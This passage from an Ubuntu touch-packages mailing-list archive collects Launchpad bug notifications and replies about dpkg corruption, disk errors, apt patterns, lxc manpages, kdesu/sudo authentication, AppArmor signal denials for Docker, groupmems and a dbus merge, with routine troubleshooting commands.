dmi.product.version: Type1ProductConfigId dmi.sys.vendor: HP To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/initramfs-tools/+bug/2008051/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008151] Re: package base-files 12ubuntu4.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1
Your logs suggest that your /usr/bin/dpkg has been corrupted. There is no easy way to recover from this situation. If you have another computer of the same architecture and running the same release, you can copy the /usr/bin/dpkg file from one computer to the other. If you don't have this, you can use apt download dpkg to download the dpkg package, use ar x to unpack the dpkg package, and then tar xf the data.tar.* file that was created. Then you can copy the usr/bin/dpkg from that over your /usr/bin/dpkg. Good luck. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to base-files in Ubuntu. https://bugs.launchpad.net/bugs/2008151 Title: package base-files 12ubuntu4.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1 Status in base-files package in Ubuntu: New Bug description: my dpkg dir is delete how to recover ProblemType: Package DistroRelease: Ubuntu 22.04 Package: base-files 12ubuntu4.2 ProcVersionSignature: Ubuntu 5.19.0-32.33~22.04.1-generic 5.19.17 Uname: Linux 5.19.0-32-generic x86_64 ApportVersion: 2.20.11-0ubuntu82.3 Architecture: amd64 CasperMD5CheckResult: unknown Date: Thu Feb 23 07:24:22 2023 ErrorMessage: subprocess new pre-removal script returned error exit status 1 InstallationDate: Installed on 2022-10-18 (127 days ago) InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 (20210209.1) Python3Details: /usr/bin/python3.10, Python 3.10.6, python3-minimal, 3.10.6-1~22.04 PythonDetails: N/A RelatedPackageVersions: dpkg 1.21.1ubuntu2.1 apt 2.4.8 SourcePackage: base-files Title: package base-files 12ubuntu4.2 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1 UpgradeStatus: Upgraded to jammy on 2022-10-26 (119 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/base-files/+bug/2008151/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008507] Re: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error
Thank you for taking the time to report this bug and helping to make Ubuntu better. Reviewing your dmesg attachment to this bug report it seems that there may be a problem with your hardware. I'd recommend performing a back up and then investigating the situation. Measures you might take include checking cable connections and using software tools to investigate the health of your hardware. In the event that is is not in fact an error with your hardware please set the bug's status back to New. Thanks and good luck! ** Changed in: shadow (Ubuntu) Status: New => Invalid ** Changed in: shadow (Ubuntu) Importance: Undecided => Low ** Tags added: hardware-error -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/2008507 Title: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error Status in shadow package in Ubuntu: Invalid Bug description: Not too sure what had happened. ProblemType: Package DistroRelease: Ubuntu 22.10 Package: login 1:4.11.1+dfsg1-2ubuntu1 ProcVersionSignature: Ubuntu 5.19.0-21.21-generic 5.19.7 Uname: Linux 5.19.0-21-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair Architecture: amd64 Date: Fri Feb 24 16:25:41 2023 Df: ErrorMessage: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error PythonDetails: N/A SourcePackage: shadow Title: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/2008507/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008507] Re: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade: unable to make backup link of './usr/bin/faillog' before installing new version: Input/output error
Hello, note the following lines from your dmesg:
[3.791052] ata3.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x0
[3.791095] ata3.00: BMDMA stat 0x65
[3.791116] ata3.00: failed command: READ DMA
[3.791137] ata3.00: cmd c8/00:08:00:00:00/00:00:00:00:00/e0 tag 0 dma 4096
in
res 51/04:08:00:00:00/00:00:00:00:00/e0 Emask 0x1
(device error)
[3.791202] ata3.00: status: { DRDY ERR }
[3.791222] ata3.00: error: { ABRT }
[3.793984] ata3.00: configured for UDMA/133
[3.794009] ata3: EH complete
[3.806999] ata3.00: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x0
[3.807047] ata3.00: BMDMA stat 0x65
[3.807068] ata3.00: failed command: READ DMA
[3.807089] ata3.00: cmd c8/00:08:00:00:00/00:00:00:00:00/e0 tag 0 dma 4096
in
res 51/04:08:00:00:00/00:00:00:00:00/e0 Emask 0x1
(device error)
[3.807154] ata3.00: status: { DRDY ERR }
[3.807174] ata3.00: error: { ABRT }
[3.809935] ata3.00: configured for UDMA/133
[3.809961] ata3: EH complete
There's lots of these in your logs -- they indicate failure
communicating with the hard drive. This could be failing hard drive, bad
cables, bad power supply, bad motherboard, etc.
I suggest making backups if you don't already have some -- do not
overwrite old backups, you may need those. Then troubleshoot or replace
etc.
Thanks
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to shadow in Ubuntu.
https://bugs.launchpad.net/bugs/2008507
Title:
package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade:
unable to make backup link of './usr/bin/faillog' before installing
new version: Input/output error
Status in shadow package in Ubuntu:
Invalid
Bug description:
Not too sure what had happened.
ProblemType: Package
DistroRelease: Ubuntu 22.10
Package: login 1:4.11.1+dfsg1-2ubuntu1
ProcVersionSignature: Ubuntu 5.19.0-21.21-generic 5.19.7
Uname: Linux 5.19.0-21-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
Architecture: amd64
Date: Fri Feb 24 16:25:41 2023
Df:
ErrorMessage: unable to make backup link of './usr/bin/faillog' before
installing new version: Input/output error
PythonDetails: N/A
SourcePackage: shadow
Title: package login 1:4.11.1+dfsg1-2ubuntu1 failed to install/upgrade:
unable to make backup link of './usr/bin/faillog' before installing new
version: Input/output error
UpgradeStatus: No upgrade log present (probably fresh install)
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/2008507/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2008141] Re: apt pattern to list packages from universe
Awesome! Thanks, I thought 'section' would have been something like libs vs oldlibs in Debian, so I didn't even try it. Sorry. apt list '?installed?section(^universe/)' -- seems to work as I wanted. Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/2008141 Title: apt pattern to list packages from universe Status in apt package in Ubuntu: Triaged Bug description: Hello, a friend would like to remove all universe packages from their system but I do not know an easy way to discover which installed packages came from universe. I expected one of these two apt patterns to work: ?archive(REGEX), ~AREGEX Selects versions that come from the archive that matches the specified regular expression. Archive, here, means the values after a= in apt-cache policy. ?origin(REGEX), ~OREGEX Selects versions that come from the origin that matches the specified regular expression. Origin, here, means the values after o= in apt-cache policy. However, a quick check of my own system's apt-cache policy output shows the a= and o= values aren't helpful for determining universe from main: $ apt-cache policy | grep -A1 universe 500 http://security.ubuntu.com/ubuntu focal-security/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-security,n=focal,l=Ubuntu,c=universe,b=amd64 origin security.ubuntu.com -- 400 http://192.168.0.27/ubuntu focal-proposed/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-proposed,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 -- 500 http://192.168.0.27/ubuntu focal-updates/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal-updates,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 -- 500 http://192.168.0.27/ubuntu focal/universe amd64 Packages release v=20.04,o=Ubuntu,a=focal,n=focal,l=Ubuntu,c=universe,b=amd64 origin 192.168.0.27 Are there apt patterns that can select the c=universe state? Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/2008141/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2009544] [NEW] OpenSSL 3 performance regression
Public bug reported: Hello, it sounds like there's some significant performance regressions in OpenSSL 3: https://github.com/openssl/openssl/issues/20286#issuecomment-1438826816 Some we might be able to address with: https://github.com/openssl/openssl/pull/18151 Some of the performance differences may be subject to ongoing work. Thanks ** Affects: openssl (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to openssl in Ubuntu. https://bugs.launchpad.net/bugs/2009544 Title: OpenSSL 3 performance regression Status in openssl package in Ubuntu: New Bug description: Hello, it sounds like there's some significant performance regressions in OpenSSL 3: https://github.com/openssl/openssl/issues/20286#issuecomment-1438826816 Some we might be able to address with: https://github.com/openssl/openssl/pull/18151 Some of the performance differences may be subject to ongoing work. Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/2009544/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2009738] [NEW] no lxc manpage
Public bug reported: Hello, I don't have an lxc manpage on my focal system: $ man lxc No manual entry for lxc $ dpkg -l lxd | grep lxd ; snap info lxd | grep installed un lxd (no description available) installed: 5.11-ad0b61e (24483) 149MB - It looks a bit like none are packaged: $ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz' $ While I appreciate the online --help output, I also like having longer- form documentation available on a system without needing to use a web browser. Thanks ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: lxc (not installed) ProcVersionSignature: Ubuntu 5.4.0-139.156-generic 5.4.224 Uname: Linux 5.4.0-139-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 CasperMD5CheckResult: skip Date: Wed Mar 8 18:21:08 2023 SourcePackage: lxc UpgradeStatus: Upgraded to focal on 2020-01-24 (1138 days ago) ** Affects: lxc (Ubuntu) Importance: Undecided Status: New ** Tags: amd64 apport-bug focal -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/2009738 Title: no lxc manpage Status in lxc package in Ubuntu: New Bug description: Hello, I don't have an lxc manpage on my focal system: $ man lxc No manual entry for lxc $ dpkg -l lxd | grep lxd ; snap info lxd | grep installed un lxd (no description available) installed: 5.11-ad0b61e (24483) 149MB - It looks a bit like none are packaged: $ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz' $ While I appreciate the online --help output, I also like having longer-form documentation available on a system without needing to use a web browser. Thanks ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: lxc (not installed) ProcVersionSignature: Ubuntu 5.4.0-139.156-generic 5.4.224 Uname: Linux 5.4.0-139-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 CasperMD5CheckResult: skip Date: Wed Mar 8 18:21:08 2023 SourcePackage: lxc UpgradeStatus: Upgraded to focal on 2020-01-24 (1138 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2009738/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2009738] Re: no lxc manpage
Ah, thanks twice over. I've poked the old bug with a hope for a happier answer today :) Unfortunately lxc manpage isn't exactly ideal: $ lxc manpage lxc Error: open /var/lib/snapd/hostfs/home/sarnold/tmp/takehometests/lxc/lxc.alias.add.1: no such file or directory -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/2009738 Title: no lxc manpage Status in lxc package in Ubuntu: New Bug description: Hello, I don't have an lxc manpage on my focal system: $ man lxc No manual entry for lxc $ dpkg -l lxd | grep lxd ; snap info lxd | grep installed un lxd (no description available) installed: 5.11-ad0b61e (24483) 149MB - It looks a bit like none are packaged: $ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz' $ While I appreciate the online --help output, I also like having longer-form documentation available on a system without needing to use a web browser. Thanks ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: lxc (not installed) ProcVersionSignature: Ubuntu 5.4.0-139.156-generic 5.4.224 Uname: Linux 5.4.0-139-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 CasperMD5CheckResult: skip Date: Wed Mar 8 18:21:08 2023 SourcePackage: lxc UpgradeStatus: Upgraded to focal on 2020-01-24 (1138 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2009738/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2009738] Re: no lxc manpage
Ah but it's still plenty useful, Simon showed me I was holding the tool the wrong way around. Having 300 manpages in a directory is a pretty fantastic starting point. Thanks :) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/2009738 Title: no lxc manpage Status in lxc package in Ubuntu: Won't Fix Bug description: Hello, I don't have an lxc manpage on my focal system: $ man lxc No manual entry for lxc $ dpkg -l lxd | grep lxd ; snap info lxd | grep installed un lxd (no description available) installed: 5.11-ad0b61e (24483) 149MB - It looks a bit like none are packaged: $ find /snap/lxd -name '*.1.gz' -o -name '*.7.gz' -o -name '*.8.gz' $ While I appreciate the online --help output, I also like having longer-form documentation available on a system without needing to use a web browser. Thanks ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: lxc (not installed) ProcVersionSignature: Ubuntu 5.4.0-139.156-generic 5.4.224 Uname: Linux 5.4.0-139-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.11-0ubuntu27.25 Architecture: amd64 CasperMD5CheckResult: skip Date: Wed Mar 8 18:21:08 2023 SourcePackage: lxc UpgradeStatus: Upgraded to focal on 2020-01-24 (1138 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/2009738/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1965439] Re: [SRU] kdesu fails to authenticate with sudo from Jammy
BlackMage, the publishing history page suggests the fix was published a year earlier: https://launchpad.net/ubuntu/+source/kdesu/5.92.0-0ubuntu1.1 What is the output of: apt policy libkf5su-data namei -l /etc/sudoers.d/kdesu-sudoers Thanks -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to sudo in Ubuntu. https://bugs.launchpad.net/bugs/1965439 Title: [SRU] kdesu fails to authenticate with sudo from Jammy Status in kdesu package in Ubuntu: Fix Released Status in kubuntu-settings package in Ubuntu: Fix Released Status in sudo package in Ubuntu: Won't Fix Status in ubuntustudio-default-settings package in Ubuntu: Fix Released Status in kdesu source package in Jammy: Fix Released Status in kubuntu-settings source package in Jammy: In Progress Status in sudo source package in Jammy: Won't Fix Status in ubuntustudio-default-settings source package in Jammy: Fix Released Status in kdesu source package in Kinetic: Fix Released Status in kubuntu-settings source package in Kinetic: Fix Released Status in sudo source package in Kinetic: Won't Fix Status in ubuntustudio-default-settings source package in Kinetic: Fix Released Status in kdesu package in Debian: Fix Released Bug description: kdesu fails to authenticate with sudo from Jammy. See upstream bug: KDE bug: https://bugs.kde.org/show_bug.cgi?id=452532 Examples: Launch Kubuntu driver manager from system setting, launching ksystemlog from the main menu, or trying to run krusader root mode option via its 'Tools > Start Krusader Root Mode' menu entry. Assuming that the current user is a member of the sudo group. On entering the correct password authentication is refused, stating that possibly an incorrect password has been entered. It appears that kdesu fails to cope with the sudo config change in this commit: https://salsa.debian.org/sudo- team/sudo/-/commit/59db341d46aa4c26b54c1270e69f2562e7f3d751 kdesu was fixed in Debian with: https://tracker.debian.org/news/1330116/accepted-kdesu-5940-2-source- into-unstable/ and fixed in kinetic with: https://launchpad.net/ubuntu/+source/kdesu/5.94.0-0ubuntu2 The issue can be worked around by adding /etc/sudoers.d/kdesu-sudoers with the contents Defaults!/usr/lib/*/libexec/kf5/kdesu_stub !use_pty [Impact] * Users are unable to authenticate to and launch applications via kdesu. * This should be backported to restore functionality that users expect. [Test Plan] * Launch Kubuntu driver manager from system setting, launching ksystemlog from the main menu, or trying to run krusader root mode option via its 'Tools > Start Krusader Root Mode' menu entry. Assuming that the current user is a member of the sudo group. * Confirm that the application authentcate and launch as successfully as in previous releases. [Where problems could occur] * While this update only returns sudo to its default behaviour (used in previous releases and virtually all other distributions) for kdesu, care should be taken to test some other applications that seek root permissions to confirm that no unexpected consequences occur. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/kdesu/+bug/1965439/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2035644] Re: apt status not updated ubuntu 20 LTS
** Package changed: isc-dhcp (Ubuntu) => apt (Ubuntu) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apt in Ubuntu. https://bugs.launchpad.net/bugs/2035644 Title: apt status not updated ubuntu 20 LTS Status in apt package in Ubuntu: New Bug description: Hi, is this a cache bug? The packages are installed, but "apt list --upgradable" say's no, the are not installed. root@minion:~# apt list --upgradable Listing... Done uls-client/luxux-standard-ubuntu20-x-amd64-dp-tserver 3.15-7ubuntu20 amd64 [upgradable from: 3.15-7ubuntu20] venv-salt-minion/ubuntu20-x-amd64-res-suma-dp-tserver 3006.0-2.35.1 amd64 [upgradable from: 3006.0-2.35.1] root@minion:~# apt install uls-client Reading package lists... Done Building dependency tree Reading state information... Done The following packages were automatically installed and are no longer required: linux-headers-5.4.0-153 linux-headers-5.4.0-153-generic linux-image-5.4.0-153-generic linux-modules-5.4.0-153-generic linux-modules-extra-5.4.0-153-generic Use 'apt autoremove' to remove them. Recommended packages: libncursesw5 The following packages will be upgraded: uls-client 1 upgraded, 0 newly installed, 0 to remove and 1 not upgraded. Need to get 0 B/194 kB of archives. After this operation, 0 B of additional disk space will be used. (Reading database ... 177475 files and directories currently installed.) Preparing to unpack .../uls-client_3.15-7ubuntu20_amd64.deb ... redirecting to systemd Unpacking uls-client (3.15-7ubuntu20) over (3.15-7ubuntu20) ... Setting up uls-client (3.15-7ubuntu20) ... Processing triggers for man-db (2.9.1-1) ... Processing triggers for systemd (245.4-4ubuntu3.22) ... root@minion:~# apt list --upgradable Listing... Done uls-client/luxux-standard-ubuntu20-x-amd64-dp-tserver 3.15-7ubuntu20 amd64 [upgradable from: 3.15-7ubuntu20] venv-salt-minion/ubuntu20-x-amd64-res-suma-dp-tserver 3006.0-2.35.1 amd64 [upgradable from: 3006.0-2.35.1] root@minion:~# apt update Hit:12 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-dp-tserver/ Release Hit:13 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-dp-tserver/ Release Hit:14 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-res-suma-dp-tserver/ Release Hit:15 https://SuMa:443/rhn/manager/download luxux-puppet-ubuntu20-x-amd64-dp-tserver/ Release Hit:16 https://SuMa:443/rhn/manager/download tvm-standard-ubuntu20-x-amd64-dp-tserver/ Release Hit:17 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-updates-dp-tserver/ Release Hit:18 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-security-dp-tserver/ Release Hit:19 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-universe-dp-tserver/ Release Hit:20 https://SuMa:443/rhn/manager/download luxux-standard-ubuntu20-x-amd64-dp-tserver/ Release Hit:21 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-updates-universe-dp-tserver/ Release Hit:22 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-main-security-universe-dp-tserver/ Release Reading package lists... Done Building dependency tree Reading state information... Done 2 packages can be upgraded. Run 'apt list --upgradable' to see them. root@minion:~# apt list --upgradable Listing... Done uls-client/luxux-standard-ubuntu20-x-amd64-dp-tserver 3.15-7ubuntu20 amd64 [upgradable from: 3.15-7ubuntu20] venv-salt-minion/ubuntu20-x-amd64-res-suma-dp-tserver 3006.0-2.35.1 amd64 [upgradable from: 3006.0-2.35.1] root@minion:~# apt upgrade Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages were automatically installed and are no longer required: linux-headers-5.4.0-153 linux-headers-5.4.0-153-generic linux-image-5.4.0-153-generic linux-modules-5.4.0-153-generic linux-modules-extra-5.4.0-153-generic Use 'apt autoremove' to remove them. The following packages will be upgraded: uls-client venv-salt-minion 2 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 22.7 MB/22.9 MB of archives. After this operation, 0 B of additional disk space will be used. Do you want to continue? [Y/n] Y Get:1 https://SuMa:443/rhn/manager/download ubuntu20-x-amd64-res-suma-dp-tserver/ venv-salt-minion 3006.0-2.35.1 [22.7 MB] Fetched 22.7 MB in 0s (76.8 MB/s) (Reading database ... 177475 files and directories currently installed.) Preparing to unpack .../uls-client_3.15-7ubuntu20_amd64.deb ... redirecting to systemd Unpacking uls-client (3.15-7ubuntu20) over (3.15-7ubuntu20) ... Preparing to unpack .../venv-salt-minion_3006.0-2.35.1_amd64.deb ... Unpacking venv-salt-minion (3006.0-2.35.1) over (3006.0-2.35.1) ... Setting up venv-salt-minion (3006.0-2.35.1) ... Setting up uls-client (3.15-7ubuntu20) ... Proc
[Touch-packages] [Bug 2039294] Re: apparmor docker
Are you perhaps mixing Docker packages from one source with Docker AppArmor profiles from another source? AppArmor policy around signals is a bit more involved than around files: - The sending process must have permission to send the signal to the recipient - The receiving process must have permission to receive the signal from the sender Make sure both your docker-default profile and your /usr/sbin/runc profile have the necessary permissions. Thanks ** Changed in: apparmor (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apparmor in Ubuntu. https://bugs.launchpad.net/bugs/2039294 Title: apparmor docker Status in apparmor package in Ubuntu: Incomplete Bug description: No LSB modules are available. Distributor ID: Ubuntu Description:Ubuntu 23.10 Release:23.10 Codename: mantic Docker version 24.0.5, build 24.0.5-0ubuntu1 Graceful shutdown doesn't work anymore due to SIGTERM and SIGKILL (maybe all signals?) doesn't reach the target process. Works when apparmor is uninstalled. [17990.085295] audit: type=1400 audit(1697213244.019:981): apparmor="DENIED" operation="signal" class="signal" profile="docker-default" pid=172626 comm="runc" requested_mask="receive" denied_mask="receive" signal=term peer="/usr/sbin/runc" [17992.112517] audit: type=1400 audit(1697213246.043:982): apparmor="DENIED" operation="signal" class="signal" profile="docker-default" pid=172633 comm="runc" requested_mask="receive" denied_mask="receive" signal=kill peer="/usr/sbin/runc" To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/2039294/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2039541] Re: groupmems prompts for password when run as sudo/root
Nice find. My guess is that the Debian maintainer forgot to include the pam.d configuration file supplied by upstream when this new tool was included: - https://github.com/shadow-maint/shadow/blob/master/etc/pam.d/groupmems - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=663117 We could decide either to: - support the tool properly and include the pam.d file - drop the tool entirely because we've made it this far without anyone noticing, and we made it several decades before someone wrote the tool in the first place - ignore it entirely because it doesn't seem to be hurting anything as it is Properly including the tool might bring with it any security problems that it might have. Leaving it alone probably doesn't bring security problems. In any event we should also file a bug with Debian so they can make a decision, too. Thanks ** Bug watch added: Debian Bug tracker #663117 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=663117 -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/2039541 Title: groupmems prompts for password when run as sudo/root Status in shadow package in Ubuntu: New Bug description: When trying to clear users from a group using the groupmems command, the user is always prompted for the root's password, even when running as root or via sudo: (as root) # addgroup testgroup # groupmems -g testgroup -p Password: (via sudo) # sudo addgroup testgroup # sudo groupmems -g testgroup -p Password: I'm not sure if this is desired behavior, but I would expect this command to work without the root password. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/2039541/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2045668] Re: Please merge dbus 1.14.10-3 (main) from Debian unstable
usr-is-merged should probably be in main, it serves as an indicator that the system is already using the usrmerge layout. From: https://lists.debian.org/debian-ctte/2022/07/msg00019.html The usrmerge package has been updated to pick up a few fixes from Ubuntu, and most importantly to provide a new lightweight metapackage, usr-is-merged, that can only be installed on merged-usr systems, to provide a way for installers to avoid the additional dependencies of usrmerge when they set up the filesystem correctly by themselves (eg: debootstrap), and for users who already completed the transition. It also gained a flag file that stops the package from updating the system, clearly marked as making the system unsupported. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to dbus in Ubuntu. https://bugs.launchpad.net/bugs/2045668 Title: Please merge dbus 1.14.10-3 (main) from Debian unstable Status in dbus package in Ubuntu: In Progress Bug description: 1.14.10-3 Published in sid-release on 2023-10-30 dbus (1.14.10-3) unstable; urgency=medium * d/control: dbus Depends on usr-is-merged (>= 38~). Non-merged /usr has been unsupported since Debian 12, as per Technical Committee resolutions #978636 and #994388 (please see the Debian 12 release notes for details). The version of usr-is-merged shipped in Debian 12 had an undocumented opt-out mechanism intended for use on buildds and QA systems targeting Debian 12 (piuparts, reproducible-builds, autopkgtest and similar), to ensure that the upgrade path from Debian 11 to 12 will continue to work and continue to undergo automated tests. That opt-out is no longer applicable or available in trixie/sid, and was removed in usrmerge version 38. Since version 1.14.10-2, dbus ships its systemd units in /usr/lib/systemd/system, as part of the distro-wide transition away from making use of "aliased" paths. This is entirely valid on merged-/usr systems, but will no longer work in the unsupported filesystem layout with non-merged /usr, because for historical reasons, current versions of systemd on non-merged-/usr systems will only read units from /lib/systemd/system. In the case of dbus, the symptom when this assumption is broken is particularly bad (various key system services will not start, with long delays during boot, login and shutdown), so let's hold back this upgrade on unsupported non-merged-/usr systems until they have completed the switch to merged-/usr and can install usr-is-merged (>= 38~). (Closes: #1054650) -- Simon McVittie Mon, 30 Oct 2023 11:51:35 + 1.14.10-2 Superseded in sid-release on 2023-10-30 dbus (1.14.10-2) unstable; urgency=low * Backport packaging changes from experimental: - Install systemd system units into /usr/lib/systemd/system. This was allowed by TC resolution #1053901. The shared library is still in /lib, for now. Build-depend on debhelper 13.11.6~ to ensure that the units are still picked up by dh_installsystemd. - Build-depend on pkgconf rather than pkg-config - dbus-x11: Don't copy XDG_SEAT_PATH, XDG_SESSION_PATH to activation environment. These variables are specific to a single login session. * d/copyright: Drop unused entry for pkg.m4. This is no longer included in the upstream source release since 1.14.6. * d/dbus-tests.lintian-overrides: Drop unused overrides. Lintian no longer flags our RUNPATH as problematic. -- Simon McVittie Wed, 25 Oct 2023 15:56:36 +0100 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/2045668/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 2045855] Re: package bluez 5.64-0ubuntu1.1 failed to install/upgrade: end of file on stdin at conffile prompt
